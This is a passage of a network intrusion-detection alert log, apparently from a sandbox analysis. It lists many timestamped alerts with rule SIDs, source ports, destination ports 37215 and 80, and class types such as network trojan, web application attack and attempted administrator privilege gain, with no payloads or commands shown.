              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.730340
              SID:2829579
              Source Port:34008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.930759
              SID:2829579
              Source Port:33768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.170154
              SID:2030092
              Source Port:53182
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.221501
              SID:2030092
              Source Port:50200
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.639864
              SID:2829579
              Source Port:51214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.136395
              SID:2030092
              Source Port:36728
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.205893
              SID:2829579
              Source Port:36610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.192228
              SID:2030092
              Source Port:60074
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.494522
              SID:2829579
              Source Port:39212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.704450
              SID:2835222
              Source Port:40856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.866110
              SID:2829579
              Source Port:54502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.831568
              SID:2030092
              Source Port:53462
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.726932
              SID:2829579
              Source Port:34468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.226767
              SID:2835222
              Source Port:33888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.957760
              SID:2829579
              Source Port:51050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.084991
              SID:2030092
              Source Port:58912
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.643438
              SID:2835222
              Source Port:54252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.087778
              SID:2025883
              Source Port:46684
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.214768
              SID:2835222
              Source Port:50926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.115391
              SID:2030092
              Source Port:57908
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.879110
              SID:2835222
              Source Port:58050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.647915
              SID:2835222
              Source Port:51404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.680398
              SID:2835222
              Source Port:39902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.194715
              SID:2835222
              Source Port:37402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.642678
              SID:2835222
              Source Port:41888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.801648
              SID:2835222
              Source Port:42440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.203547
              SID:2835222
              Source Port:45678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.873252
              SID:2025883
              Source Port:52736
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.759599
              SID:2835222
              Source Port:43962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.182265
              SID:2829579
              Source Port:34830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.995486
              SID:2835222
              Source Port:58564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.202797
              SID:2835222
              Source Port:49114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.943220
              SID:2829579
              Source Port:34092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.200487
              SID:2835222
              Source Port:38990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.188379
              SID:2835222
              Source Port:44576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.328277
              SID:2030092
              Source Port:34562
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.014210
              SID:2835222
              Source Port:56360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.126715
              SID:2030092
              Source Port:43072
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.217347
              SID:2030092
              Source Port:36550
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.822693
              SID:2030092
              Source Port:34326
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.802263
              SID:2025883
              Source Port:47840
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.996932
              SID:2835222
              Source Port:38538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.145724
              SID:2030092
              Source Port:33994
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.948996
              SID:2835222
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.013509
              SID:2835222
              Source Port:52976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.699989
              SID:2835222
              Source Port:56932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.502251
              SID:2829579
              Source Port:51694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.134607
              SID:2030092
              Source Port:39618
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.943966
              SID:2835222
              Source Port:60614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.956134
              SID:2829579
              Source Port:38414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.639134
              SID:2829579
              Source Port:37932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.227634
              SID:2829579
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.012794
              SID:2829579
              Source Port:49156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.673517
              SID:2835222
              Source Port:38196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.663241
              SID:2835222
              Source Port:54254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.509056
              SID:2829579
              Source Port:43224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.952964
              SID:2835222
              Source Port:56508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.965473
              SID:2829579
              Source Port:48328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.227237
              SID:2030092
              Source Port:45604
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.139988
              SID:2030092
              Source Port:51556
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.180176
              SID:2030092
              Source Port:36034
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.711502
              SID:2835222
              Source Port:56870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.506945
              SID:2829579
              Source Port:38860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.037730
              SID:2835222
              Source Port:50096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.761061
              SID:2835222
              Source Port:36230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.263818
              SID:2835222
              Source Port:45736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.867036
              SID:2835222
              Source Port:52678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.257662
              SID:2030092
              Source Port:51362
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.796621
              SID:2829579
              Source Port:51590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.173963
              SID:2835222
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.222619
              SID:2030092
              Source Port:55402
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.244658
              SID:2829579
              Source Port:47540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.811339
              SID:2030092
              Source Port:54380
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.032058
              SID:2829579
              Source Port:51814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.828946
              SID:2829579
              Source Port:55338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.712763
              SID:2829579
              Source Port:56980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.207478
              SID:2835222
              Source Port:59202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.264605
              SID:2835222
              Source Port:48610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.170870
              SID:2829579
              Source Port:57464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.138190
              SID:2030092
              Source Port:39472
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.847523
              SID:2025883
              Source Port:58522
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.961213
              SID:2835222
              Source Port:42564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.937775
              SID:2835222
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.225874
              SID:2835222
              Source Port:60486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.871465
              SID:2829579
              Source Port:38466
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.740863
              SID:2835222
              Source Port:59230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.924273
              SID:2829579
              Source Port:55322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.701067
              SID:2829579
              Source Port:35468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.920636
              SID:2835222
              Source Port:57886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.012098
              SID:2835222
              Source Port:50268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.567099
              SID:2835222
              Source Port:45438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.798921
              SID:2835222
              Source Port:58940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.970506
              SID:2835222
              Source Port:60046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.696885
              SID:2829579
              Source Port:56356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.859446
              SID:2829579
              Source Port:55734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.489622
              SID:2829579
              Source Port:36090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.265344
              SID:2030092
              Source Port:57046
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.756024
              SID:2829579
              Source Port:37358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.863237
              SID:2835222
              Source Port:37642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.146535
              SID:2025883
              Source Port:36400
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.252450
              SID:2835222
              Source Port:37234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.658653
              SID:2835222
              Source Port:58346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.496645
              SID:2835222
              Source Port:44582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.972189
              SID:2835222
              Source Port:41548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.164056
              SID:2030092
              Source Port:50066
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.209869
              SID:2030092
              Source Port:40614
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.253866
              SID:2030092
              Source Port:56536
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.093026
              SID:2030092
              Source Port:47666
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.112260
              SID:2030092
              Source Port:60740
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.491767
              SID:2835222
              Source Port:59288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.504277
              SID:2829579
              Source Port:55388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.842965
              SID:2030092
              Source Port:49276
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.837956
              SID:2829579
              Source Port:51482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.132778
              SID:2829579
              Source Port:40686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.265357
              SID:2829579
              Source Port:51268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.164719
              SID:2030092
              Source Port:35744
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.103822
              SID:2030092
              Source Port:38728
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.772411
              SID:2829579
              Source Port:43048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.215590
              SID:2835222
              Source Port:57534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.906256
              SID:2835222
              Source Port:33836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.129599
              SID:2030092
              Source Port:39360
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.254476
              SID:2829579
              Source Port:36058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.177224
              SID:2030092
              Source Port:46608
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.765229
              SID:2030092
              Source Port:45956
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.854316
              SID:2025883
              Source Port:49022
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.220675
              SID:2030092
              Source Port:57864
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.774996
              SID:2829579
              Source Port:39138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.851207
              SID:2829579
              Source Port:55572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.750600
              SID:2829579
              Source Port:48216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.011379
              SID:2829579
              Source Port:43896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.909928
              SID:2835222
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.271532
              SID:2835222
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.926044
              SID:2829579
              Source Port:44436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.638444
              SID:2835222
              Source Port:40638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.193979
              SID:2030092
              Source Port:40012
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.111021
              SID:2030092
              Source Port:49952
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.753726
              SID:2025883
              Source Port:58648
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.646438
              SID:2829579
              Source Port:45280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.030618
              SID:2835222
              Source Port:41584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.874286
              SID:2835222
              Source Port:60666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.693449
              SID:2835222
              Source Port:37908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.979940
              SID:2835222
              Source Port:35362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.874568
              SID:2025883
              Source Port:57824
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:00.198882
              SID:2835222
              Source Port:40706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.028419
              SID:2829579
              Source Port:42996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.111653
              SID:2030092
              Source Port:36160
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.240544
              SID:2829579
              Source Port:39526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.499468
              SID:2835222
              Source Port:51642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.647206
              SID:2829579
              Source Port:39070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.679364
              SID:2829579
              Source Port:55308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.941715
              SID:2829579
              Source Port:41282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.022039
              SID:2835222
              Source Port:48046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.956930
              SID:2835222
              Source Port:39354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.190464
              SID:2030092
              Source Port:54796
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.033459
              SID:2835222
              Source Port:36414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.786107
              SID:2025883
              Source Port:40246
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:37:59.927028
              SID:2829579
              Source Port:33064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.872396
              SID:2829579
              Source Port:33202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.656592
              SID:2829579
              Source Port:34154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.856030
              SID:2829579
              Source Port:46888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.656081
              SID:2829579
              Source Port:38930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.814855
              SID:2835222
              Source Port:35140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.997798
              SID:2829579
              Source Port:42556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.247308
              SID:2030092
              Source Port:60392
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.016307
              SID:2835222
              Source Port:60502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.962047
              SID:2829579
              Source Port:56114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.731556
              SID:2829579
              Source Port:54960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.495900
              SID:2835222
              Source Port:54566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.799993
              SID:2829579
              Source Port:33426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.255864
              SID:2835222
              Source Port:46904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.027008
              SID:2829579
              Source Port:42370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.987736
              SID:2829579
              Source Port:37842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.259448
              SID:2835222
              Source Port:58672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.085779
              SID:2025883
              Source Port:50556
              Destination Port:80
              Protocol:TCP
              Classtype:Attempted Administrator Privilege Gain
              Timestamp:06/10/24-15:38:02.201892
              SID:2030092
              Source Port:53342
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.694481
              SID:2835222
              Source Port:51728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.993727
              SID:2835222
              Source Port:53342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.004662
              SID:2829579
              Source Port:53414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.169848
              SID:2829579
              Source Port:55296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.861461
              SID:2835222
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.783784
              SID:2030092
              Source Port:39218
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.176604
              SID:2030092
              Source Port:49096
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.852405
              SID:2829579
              Source Port:34956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.806681
              SID:2829579
              Source Port:58028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.971341
              SID:2829579
              Source Port:47258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.908641
              SID:2829579
              Source Port:58970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.155523
              SID:2030092
              Source Port:48748
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.178978
              SID:2030092
              Source Port:52472
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.493155
              SID:2829579
              Source Port:46310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.935900
              SID:2829579
              Source Port:38508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.215181
              SID:2030092
              Source Port:36916
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.231115
              SID:2835222
              Source Port:34872
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.270070
              SID:2829579
              Source Port:33262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.842261
              SID:2835222
              Source Port:59676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.023435
              SID:2835222
              Source Port:56786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:37:59.779104
              SID:2030092
              Source Port:59220
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.871854
              SID:2030092
              Source Port:39034
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:02.311647
              SID:2030092
              Source Port:54766
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:37:59.948996
              SID:2829579
              Source Port:42108
              Destination Port:37215
              Protocol:TCP
